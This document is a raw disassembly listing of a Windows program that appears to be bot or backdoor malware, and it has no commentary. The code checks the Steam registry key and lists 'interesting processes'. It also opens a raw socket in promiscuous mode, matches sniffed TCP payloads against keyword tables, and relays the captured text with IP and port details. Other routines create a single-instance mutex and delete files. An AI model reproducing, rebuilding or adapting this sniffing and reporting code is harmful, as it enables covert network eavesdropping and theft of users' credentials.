loc_415C88: ; CODE XREF: sub_415B60+11C�j
push [ebp+var_5C0]
call dword_417028 ; RegCloseKey
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareValveS ; "Software\\Valve\\Steam"
push 80000001h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415CC7
mov [ebp+var_40C], 1
loc_415CC7: ; CODE XREF: sub_415B60+15B�j
push [ebp+var_5C0]
call dword_417028 ; RegCloseKey
movsx eax, [ebp+var_41C]
test eax, eax
jz short loc_415D1E
cmp [ebp+var_410], 0
jnz short loc_415D1E
cmp [ebp+var_5C4], 0
jnz short loc_415D1E
cmp [ebp+var_40C], 0
jnz short loc_415D1E
cmp [ebp+var_408], 0
jnz short loc_415D1E
cmp [ebp+var_404], 0
jnz short loc_415D1E
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
jmp locret_415DF9
; ---------------------------------------------------------------------------
loc_415D1E: ; CODE XREF: sub_415B60+17C�j
; sub_415B60+185�j ...
cmp [ebp+var_404], 0
jz short loc_415D33
mov [ebp+var_5C8], offset aYes ; "Yes"
jmp short loc_415D3D
; ---------------------------------------------------------------------------
loc_415D33: ; CODE XREF: sub_415B60+1C5�j
mov [ebp+var_5C8], offset aNo ; "No"
loc_415D3D: ; CODE XREF: sub_415B60+1D1�j
cmp [ebp+var_408], 0
jz short loc_415D52
mov [ebp+var_5CC], offset aYes ; "Yes"
jmp short loc_415D5C
; ---------------------------------------------------------------------------
loc_415D52: ; CODE XREF: sub_415B60+1E4�j
mov [ebp+var_5CC], offset aNo ; "No"
loc_415D5C: ; CODE XREF: sub_415B60+1F0�j
cmp [ebp+var_40C], 0
jz short loc_415D71
mov [ebp+var_5D0], offset aYes ; "Yes"
jmp short loc_415D7B
; ---------------------------------------------------------------------------
loc_415D71: ; CODE XREF: sub_415B60+203�j
mov [ebp+var_5D0], offset aNo ; "No"
loc_415D7B: ; CODE XREF: sub_415B60+20F�j
cmp [ebp+var_5C4], 0
jz short loc_415D90
mov [ebp+var_5D4], offset aYes ; "Yes"
jmp short loc_415D9A
; ---------------------------------------------------------------------------
loc_415D90: ; CODE XREF: sub_415B60+222�j
mov [ebp+var_5D4], offset aNo ; "No"
loc_415D9A: ; CODE XREF: sub_415B60+22E�j
cmp [ebp+var_410], 0
jz short loc_415DAF
mov [ebp+var_5D8], offset aYes ; "Yes"
jmp short loc_415DB9
; ---------------------------------------------------------------------------
loc_415DAF: ; CODE XREF: sub_415B60+241�j
mov [ebp+var_5D8], offset aNo ; "No"
loc_415DB9: ; CODE XREF: sub_415B60+24D�j
push [ebp+var_5C8]
push [ebp+var_5CC]
push [ebp+var_5D0]
push [ebp+var_5D4]
push [ebp+var_5D8]
push offset dword_41D5A4
lea eax, [ebp+var_5B4]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
locret_415DF9: ; CODE XREF: sub_415B60+1B9�j
leave
retn 4
sub_415B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DFD proc near ; CODE XREF: sub_40A9CF+12FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415E17
jmp short locret_415E3F
; ---------------------------------------------------------------------------
loc_415E17: ; CODE XREF: sub_415DFD+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingInteres ; "Listing interesting processes"
push 0
push [ebp+var_4]
push offset sub_415B60
call sub_4095A4
add esp, 10h
locret_415E3F: ; CODE XREF: sub_415DFD+18�j
leave
retn
sub_415DFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E41 proc near ; CODE XREF: sub_415EB7+37�p
; sub_415EB7+59�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_415E52
; ---------------------------------------------------------------------------
loc_415E4B: ; CODE XREF: sub_415E41+69�j
; sub_415E41:loc_415EB1�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_415E52: ; CODE XREF: sub_415E41+8�j
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jz short loc_415EB3
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EB1
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4+4], 0
jz short loc_415EAC
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EAC
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EAC: ; CODE XREF: sub_415E41+49�j
; sub_415E41+67�j
push 1
pop eax
jmp short locret_415EB5
; ---------------------------------------------------------------------------
loc_415EB1: ; CODE XREF: sub_415E41+3A�j
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EB3: ; CODE XREF: sub_415E41+1D�j
xor eax, eax
locret_415EB5: ; CODE XREF: sub_415E41+6E�j
leave
retn
sub_415E41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EB7 proc near ; CODE XREF: sub_415F69+420�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
jz short loc_415EDD
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EDD
push 1
pop eax
jmp loc_415F67
; ---------------------------------------------------------------------------
loc_415EDD: ; CODE XREF: sub_415EB7+7�j
; sub_415EB7+1C�j
cmp [ebp+arg_8], 1
jb short loc_415EFF
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D6D4
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415EFF
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415EFF: ; CODE XREF: sub_415EB7+2A�j
; sub_415EB7+41�j
cmp [ebp+arg_8], 2
jb short loc_415F21
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D730
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F21
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F21: ; CODE XREF: sub_415EB7+4C�j
; sub_415EB7+63�j
cmp [ebp+arg_8], 3
jb short loc_415F43
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D7A4
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F43
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F43: ; CODE XREF: sub_415EB7+6E�j
; sub_415EB7+85�j
cmp [ebp+arg_8], 4
jb short loc_415F65
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D7E8
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F65
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F65: ; CODE XREF: sub_415EB7+90�j
; sub_415EB7+A7�j
xor eax, eax
loc_415F67: ; CODE XREF: sub_415EB7+21�j
; sub_415EB7+46�j ...
pop ebp
retn
sub_415EB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F69 proc near ; DATA XREF: sub_41665C+A6�o
var_19B8 = dword ptr -19B8h
var_19B4 = byte ptr -19B4h
var_18B4 = dword ptr -18B4h
var_18B0 = byte ptr -18B0h
var_17B0 = dword ptr -17B0h
var_17AC = dword ptr -17ACh
var_17A8 = byte ptr -17A8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = byte ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = dword ptr -1614h
var_1610 = dword ptr -1610h
var_160C = byte ptr -160Ch
var_140C = byte ptr -140Ch
var_127E = byte ptr -127Eh
var_1278 = byte ptr -1278h
var_1274 = byte ptr -1274h
var_1268 = word ptr -1268h
var_1264 = byte ptr -1264h
var_1263 = byte ptr -1263h
var_125C = dword ptr -125Ch
var_1258 = word ptr -1258h
var_1254 = byte ptr -1254h
var_1154 = dword ptr -1154h
var_1150 = dword ptr -1150h
var_114C = byte ptr -114Ch
var_114B = byte ptr -114Bh
var_104C = dword ptr -104Ch
var_1048 = word ptr -1048h
var_1044 = dword ptr -1044h
var_1038 = byte ptr -1038h
var_1037 = byte ptr -1037h
var_1030 = byte ptr -1030h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 19B8h
call sub_416BC0
push edi
push 3ABh
push [ebp+arg_0]
lea eax, [ebp+var_1614]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movsx eax, [ebp+var_160C]
neg eax
sbb eax, eax
lea ecx, [ebp+var_160C]
and eax, ecx
mov [ebp+var_1624], eax
push 0
push 3
push 2
call dword_417218 ; socket
mov [ebp+var_104C], eax
cmp [ebp+var_104C], 0FFFFFFFFh
jnz short loc_415FDE
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_415FDE: ; CODE XREF: sub_415F69+60�j
push 0FFh
lea eax, [ebp+var_1254]
push eax
call dword_417260 ; gethostname
lea eax, [ebp+var_1254]
push eax
call dword_41723C ; gethostbyname
mov [ebp+var_1154], eax
cmp [ebp+var_1154], 0
jnz short loc_41602B
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_41602B: ; CODE XREF: sub_415F69+A1�j
push 10h
push 0
lea eax, [ebp+var_1048]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1048], 2
mov eax, [ebp+var_1154]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_1044], eax
push 10h
lea eax, [ebp+var_1048]
push eax
push [ebp+var_104C]
call dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_416093
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_416093: ; CODE XREF: sub_415F69+109�j
mov [ebp+var_1150], 1
push 0
push 0
lea eax, [ebp+var_1620]
push eax
push 0
push 0
push 4
lea eax, [ebp+var_1150]
push eax
push 98000001h
push [ebp+var_104C]
call dword_41725C ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4160EA
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_4160EA: ; CODE XREF: sub_415F69+160�j
lea eax, [ebp+var_1030]
mov [ebp+var_161C], eax
and [ebp+var_1628], 0
and [ebp+var_4], 0
push [ebp+var_1610]
mov eax, [ebp+var_1614]
push dword ptr [eax]
push offset unk_41D9B4
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1274], 0
and [ebp+var_114C], 0
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_114B]
rep stosd
stosw
stosb
and [ebp+var_1264], 0
xor eax, eax
lea edi, [ebp+var_1263]
stosd
stosb
lea eax, [ebp+var_114C]
push eax
call sub_40CF25
push eax
call sub_4044F7
pop ecx
pop ecx
lea eax, [ebp+var_1264]
push eax
call sub_40CF25
push eax
call sub_4045B2
pop ecx
pop ecx
lea eax, [ebp+var_114C]
push eax
call dword_417244 ; inet_addr
mov [ebp+var_1618], eax
lea eax, [ebp+var_1264]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1268], ax
and [ebp+var_1038], 0
xor eax, eax
lea edi, [ebp+var_1037]
stosd
stosb
lea eax, [ebp+var_1038]
push eax
call sub_40CF25
push eax
call sub_404552
pop ecx
pop ecx
mov eax, [ebp+var_1044]
mov [ebp+var_125C], eax
lea eax, [ebp+var_1038]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1258], ax
loc_4161E6: ; CODE XREF: sub_415F69+305�j
; sub_415F69+33A�j ...
push 0
push 1028h
lea eax, [ebp+var_1030]
push eax
push [ebp+var_104C]
call dword_417248 ; recv
mov [ebp+var_17AC], eax
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_416217
jmp loc_416637
; ---------------------------------------------------------------------------
loc_416217: ; CODE XREF: sub_415F69+2A7�j
cmp [ebp+var_17AC], 0FFFFFFFFh
jz short loc_416229
cmp [ebp+var_17AC], 0
jnz short loc_41622E
loc_416229: ; CODE XREF: sub_415F69+2B5�j
jmp loc_416637
; ---------------------------------------------------------------------------
loc_41622E: ; CODE XREF: sub_415F69+2BE�j
mov eax, [ebp+var_17AC]
and [ebp+eax+var_1030], 0
mov eax, [ebp+var_161C]
mov al, [eax]
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_161C]
lea eax, [ecx+eax*4]
mov [ebp+var_1628], eax
mov eax, [ebp+var_1628]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_416273
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416273: ; CODE XREF: sub_415F69+303�j
mov eax, [ebp+var_1628]
mov al, [eax+0Ch]
shr al, 4
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_1628]
lea eax, [ecx+eax*4]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_4162A8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162A8: ; CODE XREF: sub_415F69+338�j
push [ebp+var_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_17AC], eax
mov eax, [ebp+var_161C]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jnz loc_416632
movsx eax, [ebp+var_127E]
test eax, eax
jz short loc_4162EB
mov eax, [ebp+var_161C]
mov eax, [eax+10h]
cmp eax, [ebp+var_125C]
jz short loc_4162EB
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162EB: ; CODE XREF: sub_415F69+36A�j
; sub_415F69+37B�j
movsx eax, [ebp+var_1278]
test eax, eax
jz short loc_41630C
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jz short loc_41630C
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_41630C: ; CODE XREF: sub_415F69+38B�j
; sub_415F69+39C�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call dword_417238 ; htons
movzx eax, ax
movzx ecx, [ebp+var_1258]
cmp eax, ecx
jnz short loc_416340
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jnz short loc_416340
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416340: ; CODE XREF: sub_415F69+3BF�j
; sub_415F69+3D0�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call dword_417238 ; htons
movzx eax, ax
movzx ecx, [ebp+var_1268]
cmp eax, ecx
jnz short loc_416374
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_1618]
jnz short loc_416374
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416374: ; CODE XREF: sub_415F69+3F3�j
; sub_415F69+404�j
push [ebp+var_1624]
push [ebp+var_1610]
push [ebp+var_17AC]
push [ebp+var_4]
call sub_415EB7
add esp, 10h
test eax, eax
jz loc_416632
and [ebp+var_19B8], 0
jmp short loc_4163AF
; ---------------------------------------------------------------------------
loc_4163A2: ; CODE XREF: sub_415F69:loc_416413�j
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_4163AF: ; CODE XREF: sub_415F69+437�j
mov eax, [ebp+var_19B8]
cmp eax, [ebp+var_17AC]
jnb short loc_416415
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4163DA
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Dh
loc_4163DA: ; CODE XREF: sub_415F69+463�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_4163F7
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 3Eh
loc_4163F7: ; CODE XREF: sub_415F69+480�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_416413
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Eh
loc_416413: ; CODE XREF: sub_415F69+49C�j
jmp short loc_4163A2
; ---------------------------------------------------------------------------
loc_416415: ; CODE XREF: sub_415F69+452�j
and [ebp+var_19B8], 0
mov eax, [ebp+var_19B8]
mov [ebp+var_17AC], eax
jmp short loc_416437
; ---------------------------------------------------------------------------
loc_41642A: ; CODE XREF: sub_415F69+507�j
; sub_415F69+51A�j ...
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_416437: ; CODE XREF: sub_415F69+4BF�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_41645F
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
jmp short loc_4164AA
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: sub_415F69+4DC�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jl short loc_416472
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416472: ; CODE XREF: sub_415F69+505�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jg short loc_416485
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416485: ; CODE XREF: sub_415F69+518�j
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_17AC]
inc eax
mov [ebp+var_17AC], eax
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_4164AA: ; CODE XREF: sub_415F69+4F4�j
cmp [ebp+var_17AC], 0
jnz short loc_4164B8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4164B8: ; CODE XREF: sub_415F69+548�j
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+0Ch]
call dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_19B4]
push eax
call sub_407A56
add esp, 0Ch
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+10h]
call dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_18B0]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_1628]
mov ax, [eax+2]
push eax
call dword_417238 ; htons
movzx eax, ax
push eax
lea eax, [ebp+var_18B0]
push eax
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call dword_417238 ; htons
movzx eax, ax
push eax
lea eax, [ebp+var_19B4]
push eax
push offset dword_41D980
lea eax, [ebp+var_17A8]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov [ebp+var_18B4], eax
mov eax, 180h
sub eax, [ebp+var_18B4]
push eax
push [ebp+var_4]
mov eax, [ebp+var_18B4]
lea eax, [ebp+eax+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_4165AD
jmp loc_416655
; ---------------------------------------------------------------------------
loc_4165AD: ; CODE XREF: sub_415F69+63D�j
mov eax, 180h
sub eax, [ebp+var_18B4]
dec eax
mov [ebp+var_17B0], eax
loc_4165BF: ; CODE XREF: sub_415F69+6C7�j
mov eax, [ebp+var_17B0]
cmp eax, [ebp+var_17AC]
jnb short loc_416632
push 180h
mov eax, [ebp+var_4]
add eax, [ebp+var_17B0]
push eax
lea eax, [ebp+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_41661F
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_41661F: ; CODE XREF: sub_415F69+6B2�j
mov eax, [ebp+var_17B0]
add eax, 17Fh
mov [ebp+var_17B0], eax
jmp short loc_4165BF
; ---------------------------------------------------------------------------
loc_416632: ; CODE XREF: sub_415F69+35B�j
; sub_415F69+42A�j ...
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416637: ; CODE XREF: sub_415F69+2A9�j
; sub_415F69:loc_416229�j ...
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_416657
; ---------------------------------------------------------------------------
loc_416653: ; CODE XREF: sub_415F69+6B4�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416655: ; CODE XREF: sub_415F69+63F�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416657: ; CODE XREF: sub_415F69+70�j
; sub_415F69+BD�j ...
pop edi
leave
retn 4
sub_415F69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41665C proc near ; CODE XREF: sub_40A9CF+9FE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push 3ABh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41667B
jmp locret_41670F
; ---------------------------------------------------------------------------
loc_41667B: ; CODE XREF: sub_41665C+18�j
cmp [ebp+arg_4], 0
jz short loc_41668F
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
jmp short loc_416696
; ---------------------------------------------------------------------------
loc_41668F: ; CODE XREF: sub_41665C+23�j
mov [ebp+var_8], 3
loc_416696: ; CODE XREF: sub_41665C+31�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+4], ecx
cmp [ebp+arg_8], 0
jz short loc_4166AD
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
jmp short loc_4166B4
; ---------------------------------------------------------------------------
loc_4166AD: ; CODE XREF: sub_41665C+47�j
mov [ebp+var_C], offset byte_41DE00
loc_4166B4: ; CODE XREF: sub_41665C+4F�j
push 200h
push [ebp+var_C]
mov eax, [ebp+var_4]
add eax, 8
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 208h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+4]
push offset dword_41D9E8
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_415F69
call sub_4095A4
add esp, 14h
locret_41670F: ; CODE XREF: sub_41665C+1A�j
leave
retn
sub_41665C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416711 proc near ; CODE XREF: sub_4167B9+6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41673B
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_41673D
; ---------------------------------------------------------------------------
loc_41673B: ; CODE XREF: sub_416711+1A�j
xor eax, eax
locret_41673D: ; CODE XREF: sub_416711+28�j
leave
retn
sub_416711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41673F proc near ; CODE XREF: sub_40A9CF+C23�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41679C
push 2
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_8], eax
push 0
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_8]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_8]
jmp short locret_41679E
; ---------------------------------------------------------------------------
loc_41679C: ; CODE XREF: sub_41673F+1B�j
xor eax, eax
locret_41679E: ; CODE XREF: sub_41673F+5B�j
leave
retn
sub_41673F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167A0 proc near ; CODE XREF: sub_4167B9+13�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_4170AC ; DeleteFileA
test eax, eax
jz short loc_4167B5
push 1
pop eax
jmp short loc_4167B7
; ---------------------------------------------------------------------------
loc_4167B5: ; CODE XREF: sub_4167A0+E�j
xor eax, eax
loc_4167B7: ; CODE XREF: sub_4167A0+13�j
pop ebp
retn
sub_4167A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167B9 proc near ; CODE XREF: sub_402698+1D9�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416711
pop ecx
test eax, eax
jz short loc_4167D9
push [ebp+arg_0]
call sub_4167A0
pop ecx
neg eax
sbb eax, eax
inc eax
jmp short loc_4167DB
; ---------------------------------------------------------------------------
loc_4167D9: ; CODE XREF: sub_4167B9+E�j
xor eax, eax
loc_4167DB: ; CODE XREF: sub_4167B9+1E�j
pop ebp
retn
sub_4167B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167DD proc near ; CODE XREF: sub_40A9CF+8E9�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_4], eax
leave
retn
sub_4167DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4167F1 proc near ; DATA XREF: .data:0042042E�o
var_12F4 = dword ptr -12F4h
var_12F0 = dword ptr -12F0h
var_12EC = byte ptr -12ECh
var_115C = byte ptr -115Ch
var_1128 = dword ptr -1128h
var_1121 = byte ptr -1121h
var_1120 = byte ptr -1120h
var_101C = dword ptr -101Ch
var_1018 = byte ptr -1018h
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417298
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 12DCh
call sub_416BC0
push ebx
push esi
push edi
mov [ebp+var_18], esp
push 2
call dword_4170F4 ; SetErrorMode
and [ebp+var_4], 0
push dword_41DA2C
push dword_41DA28
push 3B7h
push dword_41DA24
push 0
push dword_41DA20
push offset a08xX08x3x08x08 ; "%08x%x%08x%3x%08x%08x"
lea eax, [ebp+var_115C]
push eax
call sub_416B5E ; sprintf
add esp, 20h
and [ebp+var_1128], 0
jmp short loc_416875
; ---------------------------------------------------------------------------
loc_416868: ; CODE XREF: sub_4167F1:loc_4168BA�j
mov eax, [ebp+var_1128]
inc eax
mov [ebp+var_1128], eax
loc_416875: ; CODE XREF: sub_4167F1+75�j
cmp [ebp+var_1128], 0Ah
jnz short loc_416883
call sub_407148
loc_416883: ; CODE XREF: sub_4167F1+8B�j
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp+var_115C]
push eax
push 0
push 0
call dword_4170F8 ; CreateMutexA
mov [ebp+var_12F0], eax
cmp [ebp+var_12F0], 0
jz short loc_4168BA
call dword_417064 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4168BA
jmp short loc_4168BC
; ---------------------------------------------------------------------------
loc_4168BA: ; CODE XREF: sub_4167F1+BB�j
; sub_4167F1+C5�j
jmp short loc_416868
; ---------------------------------------------------------------------------
loc_4168BC: ; CODE XREF: sub_4167F1+C7�j
call sub_403BD3
call sub_405FA3
call sub_40938F
call sub_412FC6
call sub_4102AE
call sub_40E979
push 10h
push offset dword_41DA20
call sub_41055F
